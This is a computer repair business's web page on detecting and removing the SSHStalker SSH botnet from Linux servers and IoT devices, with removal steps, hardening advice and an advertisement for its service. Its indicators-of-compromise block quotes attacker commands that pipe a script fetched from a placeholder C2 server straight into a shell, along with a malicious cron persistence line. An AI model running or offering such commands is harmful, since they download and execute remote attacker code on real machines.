The SSHStalker botnet represents a sophisticated distributed attack infrastructure that targets Linux servers and IoT devices through brute-force SSH credential attacks. Once it compromises a system, this malware transforms your machine into a node in a command-and-control network used for further attacks, cryptocurrency mining, DDoS operations, and data exfiltration. While primarily a threat to servers rather than home desktops, SSHStalker increasingly targets consumer NAS devices, routers with SSH enabled, and even Linux-based media centers, making it relevant to anyone running SSH services on their network.

sshstalkerbotnet-removal cybersecurity illustration
Photo by Brett Sayles on Pexels
Think you're infected? If you're experiencing unexplained network activity, system slowdowns on Linux devices, or discovered unauthorized SSH sessions in your logs, disconnect the affected device from your network immediately and contact us at (770) 954-1947. SSHStalker can spread laterally to other machines on your network and compromise credentials for further attacks.

Threat Profile

Attribute Details
Threat Family SSH-based botnet malware / Linux remote access trojan
Primary Targets Linux servers, IoT devices, NAS systems, routers with SSH enabled
Known Aliases SSH.Stalker, SSHStalkerBot, variants tracked by various AV vendors under generic SSH trojan signatures
First Observed Activity documented since early 2010s, with continuous evolution and variant development
Distribution Method Brute-force SSH attacks against exposed port 22, credential stuffing, exploitation of default/weak passwords
Persistence Mechanisms Cron jobs, systemd services, init.d scripts, modified SSH authorized_keys files, rootkit components
Primary Capabilities Remote command execution, cryptocurrency mining, DDoS participation, credential harvesting, lateral network movement, proxy services
Network Behavior Maintains persistent C2 connections, conducts outbound SSH scanning on port 22, downloads additional payloads, establishes reverse shells
Common Artifacts Modified bash history, suspicious cron entries, unauthorized SSH keys, hidden processes, unusual CPU/network usage patterns
Detection Difficulty Moderate to high — employs rootkit techniques and process hiding, but generates detectable network traffic patterns
Removal Complexity High — requires thorough forensic analysis, complete system rebuild often recommended for production environments
Data Theft Risk High — can access all files readable by compromised account, typically targets credentials, SSH keys, and configuration files

How It Spreads

SSHStalker operates as a worm, meaning infected systems automatically seek out new victims to compromise. The botnet maintains extensive lists of IP addresses to target, systematically attempting SSH authentication using dictionaries of common usernames and passwords. When your SSH service is exposed to the internet on the default port 22, it faces thousands of automated login attempts daily from infected machines worldwide. Most administrators never notice these attempts until one succeeds.

The infection process typically exploits human factors rather than software vulnerabilities. System administrators who use default credentials, employ weak passwords, or fail to implement key-based authentication create the opening SSHStalker needs. Once the malware gains access with valid credentials, it operates with the full privileges of that user account. If that account has sudo rights or root access, the malware achieves complete system control immediately.

Common infection vectors include:

  • Default credentials on consumer devices — NAS units, routers, and IoT devices shipped with factory default SSH passwords that users never change
  • Weak password policies — Short passwords, dictionary words, or predictable patterns ("Password123", "admin2024") that fall to brute-force within hours
  • Exposed SSH services — Enabling SSH remote access without firewall restrictions, port changes, or fail2ban protection
  • Credential stuffing — Using credentials leaked from other breaches to attempt access across thousands of systems
  • Insider threats — Compromised employee credentials or contractor access that wasn't properly revoked
  • Lateral movement — Once on your network, SSHStalker scans for other SSH-enabled devices using harvested credentials or SSH keys found on the initial victim
  • Supply chain compromise — Rare cases where devices arrive pre-infected from manufacturing facilities or compromised update servers

What It Does On Your Machine

Upon successful authentication, SSHStalker immediately begins establishing persistence and concealing its presence. The malware typically downloads additional components from command-and-control servers, installs itself in multiple locations across the filesystem, and modifies system configurations to survive reboots. On systems where it gains root access, it often deploys rootkit components that hide its processes from standard monitoring tools like ps and top, making detection significantly more challenging for even experienced administrators.

The botnet transforms your machine into a multifunctional attack platform. Infected systems typically run cryptocurrency mining software that consumes 60-90% of available CPU resources, dramatically slowing legitimate operations and increasing power consumption and heat output. Your device participates in distributed denial-of-service attacks against other targets, flooding them with traffic using your internet connection and potentially making you legally liable. The malware scans your local network for additional SSH-enabled devices, attempting to spread using any credentials or SSH keys it finds in your system.

Data theft represents one of SSHStalker's most damaging capabilities. The malware systematically harvests credentials from configuration files, bash history, SSH keys (both public and private), database connection strings, API tokens, and any other authentication materials it finds. These credentials get uploaded to the botnet's controllers and often sold on underground markets or used for targeted corporate espionage. If your infected device contains business data, customer information, or intellectual property, assume that data has been compromised.

Typical SSHStalker Artifacts on Compromised Linux Systems:
/tmp/.ICE-unix/hidden_miner /var/tmp/.systemd /usr/local/bin/.update_agent ~/.ssh/authorized_keys ← modified with attacker's public key /etc/cron.d/system_update ← persistence mechanism /lib/systemd/system/network-monitor.service ← fake service # Suspicious cron entry: */15 * * * * root /tmp/.ICE-unix/hidden_miner > /dev/null 2>&1 # Modified bash_history may be cleared or contain: wget http://[C2-SERVER]/install.sh -O - | bash curl -fsSL http://[C2-SERVER]/payload | sh # Network connections to C2 infrastructure: tcp ESTABLISHED suspicious_process → [unknown-ip]:1337 tcp ESTABLISHED .systemd → mining-pool:3333

System performance degradation usually becomes noticeable within hours of infection. Legitimate users experience sluggish response times, timeout errors, and unexplained reboots as the mining software maxes out resources. Your internet bandwidth gets consumed by scanning activity and DDoS traffic, potentially triggering complaints from your ISP or causing violations of your service agreement. On business networks, the lateral scanning generates security alerts that demand investigation, and the credential theft may enable attackers to access cloud services, email accounts, and other critical infrastructure tied to the compromised keys.

Manual Removal — Step by Step

01

Isolate the Compromised System Immediately

Disconnect the infected device from your network by unplugging the Ethernet cable or disabling Wi-Fi. Do not simply shut down the system — you need it running to collect forensic information. If this is a server hosting critical services, weigh the risk of keeping it online against the damage the botnet is causing. Document the current time and your actions for incident response records.

02

Document Current State and Network Connections

Before making any changes, capture evidence. Run netstat -anp or ss -anp to document active connections and their associated processes. Use ps auxf to get a process tree. Check crontab -l (for your user) and crontab -l -u root plus files in /etc/cron.d/. Review ~/.ssh/authorized_keys and /root/.ssh/authorized_keys for unauthorized entries. Screenshot or copy this information to external media for reference.

03

Identify and Kill Malicious Processes

Use top or htop to identify processes consuming unusual CPU resources. Note the process IDs and names. Check their parent processes and binary locations with ls -la /proc/[PID]/exe. Kill suspicious processes with kill -9 [PID], but understand this is temporary — the malware will likely restart via its persistence mechanisms. The goal here is to reduce immediate damage while you work on complete removal.

04

Remove Persistence Mechanisms

Check and clean all cron jobs system-wide: /etc/crontab, /etc/cron.d/*, /var/spool/cron/*. On systemd-based systems, review systemctl list-unit-files for suspicious services and examine files in /etc/systemd/system/ and /lib/systemd/system/. Remove any unauthorized entries. On older systems, check /etc/init.d/ and /etc/rc*.d/ directories. Remove unauthorized SSH keys from all authorized_keys files throughout the system.

05

Locate and Delete Malware Binaries

Delete the executable files you identified in the process investigation. Common hiding spots include /tmp/, /var/tmp/, /dev/shm/, hidden directories in /usr/local/, and dotfile directories in user homes. Use find / -name ".*" -type d 2>/dev/null to locate hidden directories. The malware often uses names mimicking legitimate system processes. Remove entire suspicious directory trees, not just individual files, as additional components may be present.

06

Check for Rootkit Components

Run rootkit detection tools like rkhunter and chkrootkit to identify kernel-level compromises. SSHStalker variants sometimes install rootkits that modify system binaries or kernel modules. If these tools report compromises, the system may be too deeply infected to clean reliably. Check the integrity of critical system binaries by comparing file hashes against known-good versions from your distribution's repository.

07

Scan with Multiple Security Tools

Install and run Linux-compatible malware scanners like ClamAV, Malwarebytes for Linux (if available for your distribution), or ESET NOD32 Antivirus for Linux. Run full system scans and quarantine or delete any detected threats. Be aware that these tools may not catch everything, especially newer variants or custom implementations, but they provide an additional detection layer beyond manual investigation.

08

Change All Credentials and Rotate Keys

Change passwords for every user account on the system, especially root and any accounts with sudo privileges. Generate completely new SSH key pairs and revoke all old keys — assume the attackers have copies of any private keys that were on the system. Update passwords for any services, databases, or APIs that were configured on this machine. If this device had access to cloud services or remote systems, change those credentials as well and review access logs for unauthorized activity.

09

Harden SSH Configuration Before Reconnecting

Before bringing the system back online, secure SSH properly. Disable password authentication in /etc/ssh/sshd_config (set PasswordAuthentication no). Use key-based authentication only. Change the SSH port from 22 to something non-standard. Implement fail2ban to block repeated authentication attempts. Restrict SSH access to specific IP addresses using firewall rules. Consider using a VPN for all remote access instead of exposing SSH directly to the internet.

10

Consider Complete Reinstallation

For critical systems or when rootkit compromise is suspected, manual cleaning is insufficient. Back up essential data (but not binaries or scripts), wipe the system completely, and reinstall from trusted installation media. Restore only validated data files, never configuration files or executables from the compromised system. This nuclear option is the only way to guarantee complete removal when dealing with sophisticated malware that may have modified system binaries or the kernel itself.

Prevention

  1. Disable password authentication entirely and use SSH key pairs exclusively. Generate strong keys (4096-bit RSA or Ed25519) and protect private keys with passphrases. This single change eliminates the brute-force attack vector SSHStalker depends on.
  2. Change SSH from port 22 to a non-standard port above 1024. While not true security through obscurity, this dramatically reduces automated scanning traffic hitting your system and makes log files more manageable for identifying genuine threats.
  3. Implement fail2ban or similar intrusion prevention to automatically block IP addresses after a small number of failed authentication attempts. Configure it to ban for increasingly long periods on repeated offenses from the same source.
  4. Restrict SSH access using firewall rules to specific IP addresses or ranges. If you don't need SSH access from anywhere on the internet, don't expose it. Use a VPN for remote access and keep SSH bound to local network interfaces only.
  5. Keep systems updated with security patches applied promptly. While SSHStalker primarily exploits weak credentials, staying current prevents attackers from pivoting to privilege escalation exploits if they do gain limited access.
  6. Monitor system logs actively for authentication failures, successful logins from unexpected locations, or unusual patterns. Set up automated alerts for suspicious activity rather than waiting for performance problems to reveal an infection.
  7. Use network segmentation to isolate SSH-enabled devices from your primary network where possible. IoT devices, NAS systems, and other embedded Linux devices should run on separate VLANs with restricted access to sensitive resources.
  8. Audit and minimize the number of devices running SSH services. Consumer routers, media players, and smart home devices often enable SSH by default — disable it if you don't actively use it, and change default credentials immediately if you do.
Our 90-Day Warranty: When Computer Repair Roswell removes SSHStalker or any malware from your device, we back our work with a 90-day warranty. If the same infection returns within that period, we'll clean it again at no additional charge. We also provide detailed documentation of what we removed and specific recommendations for preventing reinfection on your network.

Bring It In

SSHStalker infections require expertise beyond typical malware removal because they involve Linux systems, network security, and credential management — areas where mistakes can compromise your entire infrastructure. Our technicians at Computer Repair Roswell have extensive experience with server security, IoT device hardening, and forensic analysis of compromised systems. We'll not only remove the infection but also identify how the attackers got in, what data they may have accessed, and implement proper security measures to prevent recurrence. For business customers, we provide detailed incident reports suitable for compliance documentation and insurance claims.

Located at 1255 Hembree Rd, Roswell, GA 30076, we handle Linux systems, NAS devices, network appliances, and any other SSH-capable equipment you bring in. Call us at (770) 954-1947 to discuss your situation. If you're dealing with a compromised server or suspect lateral movement across your network, we can provide emergency assessment and containment advice over the phone while you arrange to bring the equipment in. Don't let a botnet infection compromise your network, steal your data, or make you liable for attacks on others — bring it to the experts who understand both the malware and the platforms it targets.